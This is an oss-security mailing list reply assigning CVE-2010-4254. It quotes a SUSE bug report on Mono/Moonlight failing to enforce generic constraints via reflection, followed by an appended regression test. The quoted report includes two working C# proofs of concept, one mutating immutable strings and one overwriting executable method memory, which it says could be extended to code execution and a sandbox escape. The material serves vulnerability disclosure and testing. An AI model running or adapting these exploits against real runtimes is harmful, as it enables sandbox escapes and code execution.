List: oss-security
Subject: Re: [oss-security] CVE request: mono/moonlight: execution of
From: Josh Bressers <bressers () redhat ! com>
Date: 2010-11-29 20:36:20
Message-ID: 1544809689.736861291062980367.JavaMail.root () zmail01 ! collab ! prod ! int ! phx2 ! redhat ! com
Please use CVE-2010-4254 for this.
Thanks.
--
JB
----- "Thomas Biege" <thomas@suse.de> wrote:
> Hello.
>
> Just a copy-n-paste from our bugzilla (again):
>
> ------------------------------------------------------------------------------
> SP 2010-11-24 20:45:21 UTC
>
> Original (pulled by author) blog entry:
>
> So I was messing around with generic methods and discovered that generic
> constraints can be bypassed on Mono 2.6.7 and 2.8 using reflection (with the
> exception of the new() constraint). One of the fun results of this bug is that
> the String class can be made mutable without using reflection to set private
> members!
>
> The following code demonstrates this; it is legal and will run on Mono up to
> and including version 2.8:
>
> using System;
> using System.Reflection;
>
> // Mirrors the leading fields of Mono's String object layout.
> public class FakeString {
>     public int length;
>     public char start_char;
> }
>
> public class TestCase {
>     // The constraint "where T : FakeString" is what the runtime fails to enforce
>     // when the method is closed over typeof(string) via reflection.
>     private static FakeString UnsafeConversion<T>(T thing)
>         where T : FakeString
>     {
>         return thing;
>     }
>
>     public static void Main() {
>         var a = "foo";
>         var b = MakeMutable(a);
>
>         Console.WriteLine(a);
>         b.start_char = 'b';
>         Console.WriteLine(a);
>     }
>
>     private static FakeString MakeMutable(string s)
>     {
>         var m = typeof(TestCase).GetMethod("UnsafeConversion",
>             BindingFlags.NonPublic | BindingFlags.Static);
>         // Should throw: string does not satisfy the FakeString constraint.
>         var m2 = m.MakeGenericMethod(typeof(string));
>
>         var d = (Func<string, FakeString>)Delegate.CreateDelegate(
>             typeof(Func<string, FakeString>), null, m2);
>
>         return d(s);
>     }
> }
>
>
>
> Comment 1 SP 2010-11-24 20:54:20 UTC
>
> This is a follow up of the previous
> https://bugzilla.novell.com/show_bug.cgi?id=654136
>
> The original blog entry allows trusted (by moonlight) code to mutate strings
> which could be used to trick policies (e.g. give a valid URL and, once accepted
> as a valid xdomain URL, change it to something else).
>
> It can also be extended to arbitrary code execution. POC by Geoff Norton:
>
> using System;
> using System.Reflection;
> using System.Runtime.InteropServices;
>
> public class DelegateWrapper {
>     public IntPtr method_ptr;
> }
>
> public delegate void MethodWrapper ();
>
> public class BreakSandbox {
>     private static DelegateWrapper Convert <T> (T dingus) where T : DelegateWrapper {
>         return dingus;
>     }
>
>     private static DelegateWrapper ConvertDelegate (Delegate del) {
>         var m = typeof (BreakSandbox).GetMethod ("Convert",
>             BindingFlags.NonPublic | BindingFlags.Static);
>         var gm = m.MakeGenericMethod (typeof (Delegate));
>
>         var d = (Func <Delegate, DelegateWrapper>) Delegate.CreateDelegate
>             (typeof (Func <Delegate, DelegateWrapper>), null, gm);
>
>         return d (del);
>     }
>
>     public static void Main (string [] args) {
>         MethodWrapper d = delegate {
>             Console.WriteLine ("Hello");
>         };
>
>         d ();
>         var converted = ConvertDelegate (d);
>         // Overwrite the already WX page with a 'ret'
>         Marshal.WriteByte (converted.method_ptr, (byte) 0xc3);
>         d ();
>     }
> }
>
> This code won't execute on Moonlight (since all Marshal.* code is
> SecurityCritical) but it would not be hard to modify the POC to do the same
> without SecurityCritical code.
>
> Note: the bug is present in Mono but does not represent a security
> vulnerability there since Mono (unlike Moonlight) can only execute trusted
> code.
>
> ------------------------------------------------------------------------------
>
> --
> Thomas Biege <thomas@suse.de>, SUSE LINUX, Security Support & Auditing
> SUSE LINUX Products GmbH, GF: Markus Rex, HRB 16746 (AG Nuernberg)
> --
> Wer aufhoert besser werden zu wollen, hoert auf gut zu sein.
> -- Marie von Ebner-Eschenbach
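Added regression check, not part of the report above nor of Mono's own test suite: on a runtime that enforces generic constraints when a generic method is closed via reflection, MakeGenericMethod must reject a type argument that violates the "where T : ..." constraint with an ArgumentException (which is the documented behaviour of the CLR and what a fixed Mono is expected to match), while still accepting a conforming type argument. The class and method names (Boxed, ConstraintCheck, Identity) are assumptions chosen for the example; an exit status of 1 flags a runtime that still silently accepts the violating type argument.

```csharp
// Added regression check (hypothetical names; not from the original report).
// Verifies that MethodInfo.MakeGenericMethod honours generic constraints.
using System;
using System.Reflection;

// Stand-in reference type used as the constraint; string does not derive from it.
public class Boxed {
    public int value;
}

public static class ConstraintCheck {
    // Generic method whose constraint the runtime must honour at closing time.
    private static Boxed Identity<T>(T thing) where T : Boxed {
        return thing;
    }

    private static MethodInfo OpenIdentity() {
        return typeof(ConstraintCheck).GetMethod(
            "Identity", BindingFlags.NonPublic | BindingFlags.Static);
    }

    // True if the runtime rejects a type argument that violates "where T : Boxed";
    // false if it silently produces a closed method (the defect described above).
    public static bool RuntimeEnforcesConstraints() {
        try {
            OpenIdentity().MakeGenericMethod(typeof(string));
            return false;
        } catch (ArgumentException) {
            return true;
        }
    }

    // A conforming type argument must still be accepted, so the check cannot
    // pass merely because MakeGenericMethod is broken for every argument.
    public static bool ValidArgumentStillWorks() {
        MethodInfo closed = OpenIdentity().MakeGenericMethod(typeof(Boxed));
        var b = new Boxed { value = 42 };
        var result = (Boxed)closed.Invoke(null, new object[] { b });
        return ReferenceEquals(result, b);
    }

    public static int Main() {
        bool enforced = RuntimeEnforcesConstraints();
        bool valid = ValidArgumentStillWorks();
        Console.WriteLine("constraint enforced on MakeGenericMethod: " + enforced);
        Console.WriteLine("conforming type argument accepted: " + valid);
        return (enforced && valid) ? 0 : 1;
    }
}
```

The check deliberately stops at MakeGenericMethod: that is the point where a conforming runtime raises, so nothing after it (delegate creation, field writes) is needed to tell a fixed runtime from an affected one.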